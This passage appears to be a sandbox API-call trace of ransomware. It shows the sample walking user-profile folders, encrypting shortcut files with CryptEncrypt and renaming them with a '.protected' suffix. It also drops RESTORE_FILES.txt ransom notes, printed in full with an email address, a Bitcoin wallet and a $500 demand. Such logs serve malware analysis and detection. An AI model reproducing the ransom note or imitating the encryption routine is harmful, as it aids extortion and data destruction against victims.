Explorer.lnk", lpSrch=".rar") returned 0x0 [0094.991] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk") returned 118 [0094.991] StrStrW (lpFirst="Windows Explorer.lnk", lpSrch=".zip") returned 0x0 [0094.991] ReadFile (in: hFile=0x158, lpBuffer=0x514c90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesRead=0x295e2d4*=0x4cc, lpOverlapped=0x0) returned 1 [0094.993] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffb34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.993] WriteFile (in: hFile=0x158, lpBuffer=0x514c90*, nNumberOfBytesToWrite=0x4cc, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesWritten=0x295e2d4*=0x4cc, lpOverlapped=0x0) returned 1 [0094.993] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.993] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0094.993] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0094.993] CloseHandle (hObject=0x158) returned 1 [0094.993] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk.protected") returned 128 [0094.993] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User 
Pinned\\TaskBar\\Windows Explorer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Explorer.lnk.protected" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows explorer.lnk.protected")) returned 1 [0094.994] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0094.994] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="Windows") returned 1 [0094.994] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="Program Files") returned 1 [0094.994] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="Program Files (x86)") returned 1 [0094.994] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="$Recycle.bin") returned 1 [0094.994] lstrcmpiW (lpString1="Windows Media Player.lnk", lpString2="System Volume Information") returned 1 [0094.994] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk") returned 122 [0094.994] StrStrIW (lpFirst="Windows Media Player.lnk", lpSrch=".protected") returned 0x0 [0094.994] lstrcmpW (lpString1="Windows Media Player.lnk", lpString2="RESTORE_FILES.txt") returned 1 [0094.994] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0094.994] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0094.994] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick 
Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0094.994] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk") returned 122 [0094.994] StrStrW (lpFirst="Windows Media Player.lnk", lpSrch=".txt") returned 0x0 [0094.995] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk") returned 122 [0094.995] StrStrW (lpFirst="Windows Media Player.lnk", lpSrch=".rar") returned 0x0 [0094.995] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk") returned 122 [0094.995] StrStrW (lpFirst="Windows Media Player.lnk", lpSrch=".zip") returned 0x0 [0094.995] ReadFile (in: hFile=0x158, lpBuffer=0x514c90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesRead=0x295e2d4*=0x60b, lpOverlapped=0x0) returned 1 [0094.999] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff9f5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.999] WriteFile (in: hFile=0x158, lpBuffer=0x514c90*, nNumberOfBytesToWrite=0x60b, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x514c90*, lpNumberOfBytesWritten=0x295e2d4*=0x60b, lpOverlapped=0x0) returned 1 [0094.999] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.999] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, 
nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0094.999] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0094.999] CloseHandle (hObject=0x158) returned 1 [0094.999] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk.protected") returned 132 [0094.999] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Windows Media Player.lnk.protected" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\windows media player.lnk.protected")) returned 1 [0095.000] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0095.000] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0095.000] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\RESTORE_FILES.txt") returned 115 [0095.000] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\RESTORE_FILES.txt" (normalized: 
"c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0095.001] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.001] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0095.001] lstrlenA 
(lpString="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") returned 684 [0095.001] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0095.001] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.002] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0095.002] CloseHandle (hObject=0x154) returned 1 [0095.002] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0095.002] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0095.002] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\RESTORE_FILES.txt") returned 107 [0095.002] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0095.002] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.002] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0095.003] lstrlenA (lpString="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") returned 684 [0095.003] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 
[0095.003] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.003] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0095.003] CloseHandle (hObject=0x150) returned 1 [0095.003] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0095.003] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="Windows") returned -1 [0095.003] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="Program Files") returned 1 [0095.003] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="Program Files (x86)") returned 1 [0095.003] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="$Recycle.bin") returned 1 [0095.003] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="System Volume Information") returned 1 [0095.003] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk") returned 97 [0095.003] StrStrIW (lpFirst="Window Switcher.lnk", lpSrch=".protected") returned 0x0 [0095.003] lstrcmpW (lpString1="Window Switcher.lnk", lpString2="RESTORE_FILES.txt") returned 1 [0095.003] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0095.003] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0095.003] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk" (normalized: 
"c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0095.004] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk") returned 97 [0095.004] StrStrW (lpFirst="Window Switcher.lnk", lpSrch=".txt") returned 0x0 [0095.004] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk") returned 97 [0095.004] StrStrW (lpFirst="Window Switcher.lnk", lpSrch=".rar") returned 0x0 [0095.004] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk") returned 97 [0095.004] StrStrW (lpFirst="Window Switcher.lnk", lpSrch=".zip") returned 0x0 [0095.004] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x110, lpOverlapped=0x0) returned 1 [0095.005] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffef0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.005] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x110, lpOverlapped=0x0) returned 1 [0095.005] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.005] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0095.005] WriteFile 
(in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0095.005] CloseHandle (hObject=0x150) returned 1 [0095.005] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk.protected") returned 107 [0095.005] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk.protected" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\window switcher.lnk.protected")) returned 1 [0095.006] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0095.006] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0095.006] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\RESTORE_FILES.txt") returned 95 [0095.006] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0095.006] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.006] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0095.007] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.007] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0095.007] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.007] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0095.007] CloseHandle (hObject=0x14c) returned 1 [0095.008] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0095.008] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0095.008] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\RESTORE_FILES.txt") returned 82 [0095.008] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\RESTORE_FILES.txt" 
(normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0095.009] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.009] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0095.009] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.009] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0095.010] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.010] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 